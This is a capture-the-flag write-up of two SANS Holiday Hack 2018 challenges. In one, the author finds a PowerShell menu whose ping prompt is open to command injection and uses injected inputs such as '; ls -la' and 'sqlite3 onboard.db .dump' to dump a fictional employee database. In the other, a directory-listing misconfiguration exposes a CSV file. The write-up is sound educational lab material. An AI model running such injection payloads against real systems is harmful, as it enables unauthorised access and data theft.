Holiday Hack 2018: Directory Browsing

Terminal - The Name Game
I’ll find Minty Candycane to the left of the main entrance:

Can you help me? I’m in a bit of a fix.
I need to make a nametag for an employee, but I can’t remember his first name.
Maybe you can figure it out using this Cranberry Pi terminal?
The Santa’s Castle Onboarding System? I think it’s written in PowerShell, if I’m not mistaken.
PowerShell itself can be tricky when handling user input. Special characters such as & and ; can be used to inject commands.
I think that system is one of Alabaster’s creations. He’s a little … obsessed with SQLite database storage.
I don’t know much about SQLite, just the
The terminal starts with an onboarding:
We just hired this new worker,
Californian or New Yorker?
Think he's making some new toy bag...
My job is to make his name tag.
Golly gee, I'm glad that you came,
I recall naught but his last name!
Use our system or your own plan,
Find the first name of our guy "Chan!"
-Bushy Evergreen
To solve this challenge, determine the new worker's first name and submit to runtoanswer.
= =
= S A N T A ' S C A S T L E E M P L O Y E E O N B O A R D I N G =
= =
Press 1 to start the onboard process.
Press 2 to verify the system.
Press q to quit.
Please make a selection:
The terminal dumps me into the Castle Employee Onboarding program. I need to use this program to do a couple things:
- Find the first name of the new employee “Chan”
- Run the
program to submit
When I select option 2, I get the following prompt:
Validating data store for employee onboard information.
Enter address of server:
If I enter a valid ip address, I get the results of a ping command, and what looks like the output of file
on onboard.db
Validating data store for employee onboard information.
Enter address of server:
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=64 time=0.032 ms
64 bytes from icmp_seq=2 ttl=64 time=0.042 ms
64 bytes from icmp_seq=3 ttl=64 time=0.044 ms
--- ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2047ms
rtt min/avg/max/mdev = 0.032/0.039/0.044/0.007 ms
onboard.db: SQLite 3.x database
Press Enter to continue...:
I’m going to guess that the my input is stored in a variable, and that something like ping -c 3 $ip
is being run.
At this point I want to test to see if I can perform command injection. If I enter; ls -la
, I should get both the ping and the contents of the local directory, unless there is some kind of filtering going on. As my ls
command runs, I have identified command injection:
Validating data store for employee onboard information.
Enter address of server:; ls -la
connect: Network is unreachable
total 5476
drwxr-xr-x 1 elf elf 4096 Dec 20 14:38 .
drwxr-xr-x 1 root root 4096 Dec 14 16:17 ..
-rw-r--r-- 1 elf elf 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 root root 95 Dec 14 16:13 .bashrc
drwxr-xr-x 3 elf elf 4096 Dec 20 14:38 .cache
drwxr-xr-x 3 elf elf 4096 Dec 20 14:38 .local
-rw-r--r-- 1 root root 3866 Dec 14 16:13 menu.ps1
-rw-rw-rw- 1 root root 24576 Dec 14 16:13 onboard.db
-rw-r--r-- 1 elf elf 655 May 16 2017 .profile
-rwxr-xr-x 1 root root 5547968 Dec 14 16:13 runtoanswer
onboard.db: SQLite 3.x database
Press Enter to continue...
I see the onboarding database. I also see menu.ps1
, which is likely the current running program.
Next, I’ll use the command injection to dump the database. As I’m dealing with a sqlite database, I’ll use sqlite3
to interact with it. I’ll start my input with 2>/dev/null;
to redirect the ping output to nowhere.
First, I’ll list the tables (my comment added with <--
Validating data store for employee onboard information.
Enter address of server: 2>/dev/null; sqlite3 onboard.db .tables
onboard <-- result from sqlite3
onboard.db: SQLite 3.x database
Press Enter to continue...:
Only one table. I’ll try some other commands. I can put full queries into '
s to get them to run, or I can just drop into an sqlite3 shell by running 2>/dev/null; sqlite3 onboard.db
(I’ll use --
to comment my queries):
sqlite> select count(*) from onboard; -- how many rows
sqlite> select sql from sqlite_master; -- column names
CREATE TABLE onboard (
street1 TEXT,
street2 TEXT,
city TEXT,
postalcode TEXT,
phone TEXT,
email TEXT
sqlite> select * from onboard limit 1; -- example row
10|Karen|Duck|52 Annfield Rd||BEAL|DN14 7AU|077 8656 6609|
sqlite> select fname,lname from onboard where lname = "Chan"; -- first and last name of Chan
Alternatively, I could have just dumped the database (with .dump
as Minty alluded to) and used grep
Enter address of server: 2>/dev/null; sqlite3 onboard.db .dump | grep Chan
INSERT INTO "onboard" VALUES(84,'Scott','Chan','48 Colorado Way',NULL,'Los Angeles','90067','4017533509','');
onboard.db: SQLite 3.x database
Press Enter to continue...:
I still need to run runtoanswer
to complete the challenge. I remember seeing it in the ls
I first did to show injection. Since it’s in the local directory, I’ll just use ; ./runtoanswer
And that gives me another achievement:

Alternative Solution
I took a look at the source for this program by entering ; cat menu.ps1
. I won’t show the entire script here, but the here’s the section where the menu input is handled (with two comments added by me):
$input = Read-Host 'Please make a selection'
switch ($input)
'1' {
} '2' {
Write-Host "Validating data store for employee onboard information."
$server = Read-Host 'Enter address of server'
/bin/bash -c "/bin/ping -c 3 $server" <--- injection here!
/bin/bash -c "/usr/bin/file onboard.db"
} '9' { <--- undocumented option
} 'q' {
} default {
Write-Host "Invalid entry."
until ($input -eq 'q')
} finally {
First, I can see the injection point, where powershell is calling /bin/bash
and passing in my input.
More interestingly, there’s an undocumented menu option - 9. Just entering that drops me into a PowerShell prompt:
Please make a selection: 9
PowerShell v6.0.3
Copyright (c) Microsoft Corporation. All rights reserved.
Type 'help' to get help.
PS /home/elf> ls
menu.ps1 onboard.db runtoanswer
PS /home/elf>
From here, I could call sqlite
and continue just as the previous solution.
On solving, Minty tells me the following, and unlocks two hints about looking for directories that have directory listing enabled:
Thank you so much for your help! I’ve gotten Mr. Chan his name tag. I’d love to repay the favor.
Have you ever visited a website and seen a listing of files - like you’re browsing a directory? Sometimes this is enabled on web servers.
This is generally unwanted behavior. You can find sleighloads of examples by searching the web for
.On a website, it’s sometimes as simple as removing characters from the end of a URL.
What a silly misconfiguration for leaking information!

Directory Browsing
Site Overview
The CPF Site,, is relatively sparse:

The only link on the page points to

Directory Browsing
Seeing the second page at path /cfp/cfp.html
, I decided to check out the /cfp
directory. It had directory listing enabled, and a csv with rejected talks:

Find Papers in Data
I’ll grab the data with curl
and use grep
to find the paper I’m interested in:
root@kali# curl -s | grep "Data Loss for Rainbow Teams"
qmt3,2,8040424,200,FALSE,FALSE,John,McClane,Director of Security,Data Loss for Rainbow Teams: A Path in the Darkness,1,11
Since I need the answer in the form “first last”, I can use cut
to select the data I want and tr
to replace the ,
with ` `:
root@kali# curl -s | grep "Data Loss for Rainbow Teams" | cut -d, -f7-8 | tr "," " "
John McClane
Answer: John McClane
On submitting that to my badge, I’ve got another achievement: